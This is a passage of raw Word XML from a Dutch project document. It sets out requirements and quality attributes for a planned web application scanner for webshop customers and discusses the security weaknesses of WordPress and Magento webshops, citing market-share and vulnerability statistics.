      </w:tr>
      <w:tr w:rsidR="005653E3" w14:paraId="4A6ACDC7" w14:textId="0B5531C9" w:rsidTr="005653E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43965C7B" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>We moeten de service aanbod uitbreiden door een geautomatiseerde Web Applicatie Scanner te introduceren.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2888"/>
            </w:tblGrid>
            <w:tr w:rsidR="005653E3" w14:paraId="4F3420DB" w14:textId="77777777" w:rsidTr="00195C12">
              <w:trPr>
                <w:trHeight w:val="627"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7A66A77B" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
                  <w:r>
                    <w:t xml:space="preserve">Een Client applicatie voor de klant wat dient als </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:t>Endpoint</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:t xml:space="preserve"> (</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:t>Glossery</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:t xml:space="preserve">, 13) </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005653E3" w14:paraId="4BCAEEF0" w14:textId="77777777" w:rsidTr="00195C12">
              <w:trPr>
                <w:trHeight w:val="697"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1DDD3F1D" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
                  <w:r>
                    <w:t>Een communicatiemiddel tussen de Client en de Server</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005653E3" w14:paraId="1E960357" w14:textId="77777777" w:rsidTr="00195C12">
              <w:trPr>
                <w:trHeight w:val="641"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="433D37E4" w14:textId="1AE05935" w:rsidR="005653E3" w:rsidRDefault="00914A8D" w:rsidP="008B56CF">
                  <w:r>
                    <w:t>De Web</w:t>
                  </w:r>
                  <w:r w:rsidR="005653E3">
                    <w:t xml:space="preserve"> Applicatie Scanner</w:t>
                  </w:r>
                  <w:r w:rsidR="00F553C8">
                    <w:t xml:space="preserve">, </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidR="00F553C8">
                    <w:t>Crawler</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidR="00F553C8">
                    <w:t>, Scanner, Rapporteren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7C0AEE74"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3DC433A5" w14:textId="77777777" w:rsidTr="00C93D29">
              <w:trPr>
                <w:trHeight w:val="655"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="01EB5FBB" w14:textId="478782BD" w:rsidR="005653E3" w:rsidRDefault="001A3E01" w:rsidP="00C93D29">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:t>Usability</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005653E3" w14:paraId="6EAA321C" w14:textId="77777777" w:rsidTr="00C93D29">
              <w:trPr>
                <w:trHeight w:val="739"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2AFE08F4" w14:textId="440CDF59" w:rsidR="005653E3" w:rsidRDefault="00D27177" w:rsidP="00C93D29">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:t>Interoperability</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005653E3" w14:paraId="52666DD5" w14:textId="77777777" w:rsidTr="00C93D29">
              <w:trPr>
                <w:trHeight w:val="474"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="1251423A" w14:textId="61DF963D" w:rsidR="005653E3" w:rsidRDefault="00825A56" w:rsidP="00C93D29">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:t>Performance</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="212F0869"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7434C0A2" w14:textId="77777777" w:rsidTr="00C502E7">
              <w:trPr>
                <w:trHeight w:val="655"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="61A4393D" w14:textId="58E3CCDF" w:rsidR="00EF4E91" w:rsidRDefault="00C502E7" w:rsidP="00C502E7">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:t>M</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EF4E91" w14:paraId="6E6B5FF9" w14:textId="77777777" w:rsidTr="00C502E7">
              <w:trPr>
                <w:trHeight w:val="739"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="26CF0123" w14:textId="60C43575" w:rsidR="00EF4E91" w:rsidRDefault="00C502E7" w:rsidP="00C502E7">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:t>M</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EF4E91" w14:paraId="49B88F01" w14:textId="77777777" w:rsidTr="00C502E7">
              <w:trPr>
                <w:trHeight w:val="474"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="284DBF81" w14:textId="7C7BFA0A" w:rsidR="00EF4E91" w:rsidRDefault="00C502E7" w:rsidP="00C502E7">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:t>H</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="5E638FD5" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005653E3" w14:paraId="5D400583" w14:textId="2C91D7D7" w:rsidTr="005653E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E652C06" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>We moeten naast het ontwikkelen van webshop ook meer de focus leggen op security door de klant meer inzicht te bieden op de security staat van hun webshop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2888"/>
            </w:tblGrid>
            <w:tr w:rsidR="005653E3" w14:paraId="3F54DCA9" w14:textId="77777777" w:rsidTr="008B56CF">
              <w:trPr>
                <w:trHeight w:val="935"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5585" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0A56CF21" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
                  <w:r>
                    <w:t>Het genereren van een rapport op basis van de gevonden kwetsbaarheden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005653E3" w14:paraId="26728730" w14:textId="77777777" w:rsidTr="008B56CF">
              <w:trPr>
                <w:trHeight w:val="1005"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5585" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="35A217A9" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
                  <w:r>
                    <w:t>Het verzenden van het rapport via email</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="12B8F948"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5CE5793A" w14:textId="77777777" w:rsidTr="00C93D29">
              <w:trPr>
                <w:trHeight w:val="935"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5585" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="3600EF34" w14:textId="31A526A0" w:rsidR="005653E3" w:rsidRDefault="005450F9" w:rsidP="00C93D29">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:t>Modifiability</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005653E3" w14:paraId="4869E383" w14:textId="77777777" w:rsidTr="00C93D29">
              <w:trPr>
                <w:trHeight w:val="1005"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5585" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="6A689004" w14:textId="0620F79B" w:rsidR="005653E3" w:rsidRDefault="006660F8" w:rsidP="00C93D29">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:t>Availibility</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="710C63C7"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0C91F5E9" w14:textId="77777777" w:rsidTr="00C502E7">
              <w:trPr>
                <w:trHeight w:val="935"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5585" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="7AD65BF0" w14:textId="36376905" w:rsidR="00EF4E91" w:rsidRDefault="00C502E7" w:rsidP="00C502E7">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:t>H</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EF4E91" w14:paraId="774F4550" w14:textId="77777777" w:rsidTr="00C502E7">
              <w:trPr>
                <w:trHeight w:val="1005"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5585" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="56939887" w14:textId="06C4AEC6" w:rsidR="00EF4E91" w:rsidRDefault="00C502E7" w:rsidP="00C502E7">
                  <w:pPr>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:t>M</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="72121770" w14:textId="77777777" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08E28C51" w14:textId="1311A503" w:rsidR="00F71BF4" w:rsidRDefault="002F3E27" w:rsidP="002F3E27">
      <w:r>
        <w:t>Tabel 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCD1581" w14:textId="77777777" w:rsidR="00DF41B1" w:rsidRPr="00DF41B1" w:rsidRDefault="00DF41B1" w:rsidP="00DF41B1"/>
    <w:p w14:paraId="3190C78A" w14:textId="70C1FA4B" w:rsidR="008A79F1" w:rsidRDefault="006A5AE7" w:rsidP="006A5AE7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc491022054"/>
      <w:r>
        <w:t>2.2 Doelgroep</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="16BDBAA7" w14:textId="77777777" w:rsidR="009004E6" w:rsidRPr="009004E6" w:rsidRDefault="009004E6" w:rsidP="009004E6"/>
    <w:p w14:paraId="7B2540C3" w14:textId="3CC940DC" w:rsidR="008A79F1" w:rsidRDefault="008A79F1" w:rsidP="008A79F1">
      <w:r>
        <w:t xml:space="preserve">S5 ontwikkelt en onderhoudt webshops voor MKB-bedrijven. De webshops worden over het algemeen ontwikkeld in de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0087213D">
        <w:t>CMS’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Beide bedrijven hebben hun CMS in de taal PHP ontwikkeld en hebben daar hun eigen raamwerk voor gebruikt. </w:t>
      </w:r>
      <w:r w:rsidR="007347A0">
        <w:t>De doelgroepen zijn weergeven in tabel 2.8.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE7F42" w14:paraId="2C5E93E5" w14:textId="77777777" w:rsidTr="00DE7F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="267F2A81" w14:textId="0BC7371A" w:rsidR="00DE7F42" w:rsidRDefault="009E5057" w:rsidP="00731588">
            <w:r>
              <w:t>Doelgroep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="778E6250" w14:textId="36DA1AA4" w:rsidR="00DE7F42" w:rsidRDefault="009E5057" w:rsidP="008A79F1">
            <w:r>
              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE7F42" w14:paraId="3F620A96" w14:textId="77777777" w:rsidTr="00DE7F42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435C8358" w14:textId="7499B356" w:rsidR="00DE7F42" w:rsidRDefault="009E5057" w:rsidP="008A79F1">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Magento</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F27A7ED" w14:textId="4781CD39" w:rsidR="00DE7F42" w:rsidRDefault="009E5057" w:rsidP="008A79F1">
            <w:r>
              <w:t>Webshop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE7F42" w14:paraId="1071CCC0" w14:textId="77777777" w:rsidTr="00CA480E">
        <w:trPr>
          <w:trHeight w:val="222"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3CEE04" w14:textId="59AADB99" w:rsidR="00DE7F42" w:rsidRDefault="009E5057" w:rsidP="008A79F1">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Wordpres</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F83DAE8" w14:textId="0AB758E6" w:rsidR="00DE7F42" w:rsidRDefault="009E5057" w:rsidP="008A79F1">
            <w:r>
              <w:t>Webshop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D2F3AFA" w14:textId="64433CEC" w:rsidR="00B76760" w:rsidRDefault="00272E09" w:rsidP="008A79F1">
      <w:r>
        <w:t>Tabel 2.</w:t>
      </w:r>
      <w:r w:rsidR="005330B9">
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61098138" w14:textId="3171FBA6" w:rsidR="001428EA" w:rsidRDefault="00FE7016" w:rsidP="001D4CC8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc491022055"/>
      <w:r>
        <w:t xml:space="preserve">2.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="001428EA">
        <w:t>Doelgroep onderzoek</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3E1A0FC4" w14:textId="77777777" w:rsidR="001D4CC8" w:rsidRPr="001D4CC8" w:rsidRDefault="001D4CC8" w:rsidP="001D4CC8"/>
    <w:p w14:paraId="5F326EA0" w14:textId="1D9B3B61" w:rsidR="008A79F1" w:rsidRDefault="008A79F1" w:rsidP="008A79F1">
      <w:r>
        <w:t xml:space="preserve">Webshops die ontwikkeld zijn in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zijn kwetsbaar voor cyberaanvallen. 27% procent van alle websites draaien op </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en het heeft 60% van het marktaandeel als het gaat om </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CMSen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00205B00">
        <w:t>orquemag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 2xx</w:t>
      </w:r>
      <w:r w:rsidR="00C7574C">
        <w:t>x). Dit betekent</w:t>
      </w:r>
      <w:r w:rsidR="00385B76">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C7574C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C8026A">
        <w:t>in theorie</w:t>
      </w:r>
      <w:r w:rsidR="00385B76">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C8026A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C7574C">
        <w:t>dat als het CMS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> een kwetsbaarheid heeft</w:t>
      </w:r>
      <w:r w:rsidR="00354F26">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dan zijn 27% van alle websites kwetsbaar voor cyberaanvallen. Ithemes.com vermeld in het artikel “is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Really</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Secure?” dat de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CMS kampt met securityproblemen. De securityproblemen komen van drie componenten af: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Core</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>themes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>plugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. De grootste deel van de security kwetsbaarheden komt </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">niet af van de Kern van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maar van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>plugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>plugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rekenen voor 52% van alle kwetsbaarheden. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCADEA5" w14:textId="1EECD9FC" w:rsidR="008A79F1" w:rsidRDefault="005921CB" w:rsidP="008A79F1">
      <w:r>
        <w:t>Het</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D055F">
        <w:t>percentage</w:t>
      </w:r>
      <w:r w:rsidR="0003662A">
        <w:t xml:space="preserve"> van</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> ge</w:t>
      </w:r>
      <w:r w:rsidR="009E4099">
        <w:t>bruikers is wel vele malen lager</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> dan die van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> ondersteund 1.3% van alle websites en het heeft een marktaandeel van 2.7%(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>Torquemag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t>, 2xxx). In het artikel van extensionsmall.com werd de se</w:t>
      </w:r>
      <w:r w:rsidR="002279EA">
        <w:t xml:space="preserve">curity van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002279EA">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002279EA">
        <w:t xml:space="preserve"> onder de loep</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> genomen. Zij hebben uit een onderzoek van Trustwave vermeld dat 1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>Ecommerce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> nog steeds een lucratief doelwit is voor hackers 2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> is niet de meest veilige </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>ecommerce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> platform. Ook vermeld Trustwave in het rapport dat 85% van de gehackte e-commerce systemen de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> CMS gebruiken. Een reden hiervan is omdat de meeste </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> websites niet volledig up-to-date zijn met de laatste patches. Het probleem ligt grotendeels niet bij </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> maar bij de webshop eigenaren. Het maakt niet uit hoe snel een softwarebedrijf een patch vrijgeeft als de patch nooit wordt toegepast. Webshop eigenaren zijn nog steeds moeilijk te motiveren om hun </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
